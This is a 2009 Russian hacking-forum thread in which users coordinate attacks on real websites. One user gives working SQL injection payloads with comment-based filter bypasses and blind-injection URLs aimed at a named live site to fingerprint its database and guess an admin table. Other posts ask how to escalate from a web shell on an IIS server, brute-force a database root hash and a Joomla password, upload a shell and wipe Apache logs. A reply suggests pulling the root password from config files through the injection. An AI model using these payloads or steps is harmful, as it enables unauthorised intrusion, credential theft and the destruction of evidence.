28.10.2009, 18:14
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
С нами:
8799871
Репутация:
19
|
|
Сообщение от DrAssault
Реальный пример можно?  Хотя тут и по ошибке всё понятно... http://apsite.ru/x/popup.php?mod=1'
P.S. а чё тут понятно? =)
|
|
|
28.10.2009, 18:16
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
p.r0phe.t
Я не понимаю, неужели нельзя сначала хоть что-то прочитать?
Что ты хочешь что-бы тебе тут ответили без линка и с такой информацией?
А вот так что выдаёт?
.php?mod=-1'/**/union/**/select/**/1/*
А вот так?
.php?mod=-1/**/union/**/select/**/1/*
А вот так?
.php?mod=1/**/union/**/select/**/1/*
А вот так?
.php?mod=1/**/union/**/select/**/1--+
А вот так?
.php?mod=-1/**/union/**/select/**/1--+
А вот так?
.php?mod=-1/**/and/**/1=1--+
А вот так?
.php?mod=-1/**/and/**/1=2--+
Продолжаем гадание, или почитаешь что-то? А может мы увидем линк?
|
|
|
|
28.10.2009, 18:17
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
С нами:
8799871
Репутация:
19
|
|
Сообщение от jokester
p.r0phe.t
Я не понимаю, неужели нельзя сначала хоть что-то прочитать?
Что ты хочешь что-бы тебе тут ответили без линка и с такой информацией?
А вот так что выдаёт?
.php?mod=-1'/**/union/**/select/**/1/*
А вот так?
.php?mod=-1/**/union/**/select/**/1/*
А вот так?
.php?mod=1/**/union/**/select/**/1/*
А вот так?
.php?mod=1/**/union/**/select/**/1--+
А вот так?
.php?mod=-1/**/union/**/select/**/1--+
А вот так?
.php?mod=-1/**/and/**/1=1--+
А вот так?
.php?mod=-1/**/and/**/1=2--+
Продолжаем гадание, или почитаешь что-то? А может мы увидем линк?
^
^
^
^
|
|
|
|
28.10.2009, 19:10
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
p.r0phe.t
4 ветка, фильтрация пробелов, "+", "=".
file_priv=n
Если очень-очень нужно, то можно:
http://apsite.ru/x/popup.php?mod=1'/**/or/**/if(substring(version(),1,1)/**/like/**/4,1,(select/**/1/**/union/**/select/**/2))/*
подбираем таблицу:
http://apsite.ru/x/popup.php?mod=1'/**/or/**/if((select/**/1/**/from/**/admin),1,(select/**/1/**/union/**/select/**/2))/*
и дальше в этом-же ключе :
http://forum.antichat.ru/threadnav35207-1-10.html
Отличный способ от скуки
|
|
|
|
28.10.2009, 19:15
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
С нами:
9328846
Репутация:
270
|
|
есть шелл на сервере ISS 6.0, на нем висит N пользователей и N сайтов этих пользователей,и у шелла права пользователя,можно ли как то вылезти из юзера?
смд разумеется не работает.
|
|
|
|
29.10.2009, 10:52
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
С нами:
8799871
Репутация:
19
|
|
Сообщение от jokester
p.r0phe.t
4 ветка, фильтрация пробелов, "+", "=".
file_priv=n
Если очень-очень нужно, то можно:
http://apsite.ru/x/popup.php?mod=1'/**/or/**/if(substring(version(),1,1)/**/like/**/4,1,(select/**/1/**/union/**/select/**/2))/*
подбираем таблицу:
http://apsite.ru/x/popup.php?mod=1'/**/or/**/if((select/**/1/**/from/**/admin),1,(select/**/1/**/union/**/select/**/2))/*
и дальше в этом-же ключе :
http://forum.antichat.ru/threadnav35207-1-10.html
Отличный способ от скуки
а не проще так?
http://apsite.ru/x/popup.php?mod=1'/**/union/**/select/**/1/**/from/**/admin/* результат тот же..
Но,если таблица будет правильная,всё равно будет пустой экран.
Поправь если что.
http://apsite.ru/x/popup.php?mod=1'/**/or/**/if(substring(version(),1,1)/**/like/**/4,1,(select/**/1/**/union/**/select/**/2))/*
А какой смысл этого запроса,если все равно экран пустой?
Последний раз редактировалось p.r0phe.t; 29.10.2009 в 10:59..
|
|
|
|
29.10.2009, 11:03
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от p.r0phe.t
а не проще так?
http://apsite.ru/x/popup.php?mod=1'/**/union/**/select/**/1/**/from/**/admin/* результат тот же..
Но,если таблица будет правильная,всё равно будет пустой экран.
Поправь если что.
Ты перебор как будешь организовывать? Или значения полей тоже по словарю? Тогда и такой способ пойдёт
Статью прочти, которую я дал в том посте
|
|
|
|
28.10.2009, 18:55
|
|
Новичок
Регистрация: 10.12.2007
Сообщений: 11
С нами:
9694063
Репутация:
1
|
|
как себя обезопасить после проведения Sql inj.
известно:
система: Apache/2.2.6 (FreeBSD) mod_ssl/2.2.6 OpenSSL/0.9.8e DAV/2 PHP/5.2.9 with Suhosin-Patch
version(): 5.1.22-rc-log
есть login и хеш пароль roota к БД бручу... пока безуспешно.
там висит JOOMLA пасс тоже пока в бруте.
как залить шелл после того как я узнаю пасс?
логи чистить эти?
/var/log/httpd-error.log
/var/log/httpd-access.log
какие дальше действия?
|
|
|
|
28.10.2009, 19:03
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
С нами:
10024314
Репутация:
739
|
|
Скуль от какого юзера бд? МОжет через неё легче прочитать пасс root'а где-нить в конфигах чем брутить.
|
|
|
|
28.10.2009, 19:13
|
|
Новичок
Регистрация: 10.12.2007
Сообщений: 11
С нами:
9694063
Репутация:
1
|
|
root@localhost
пример запроса кинь
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
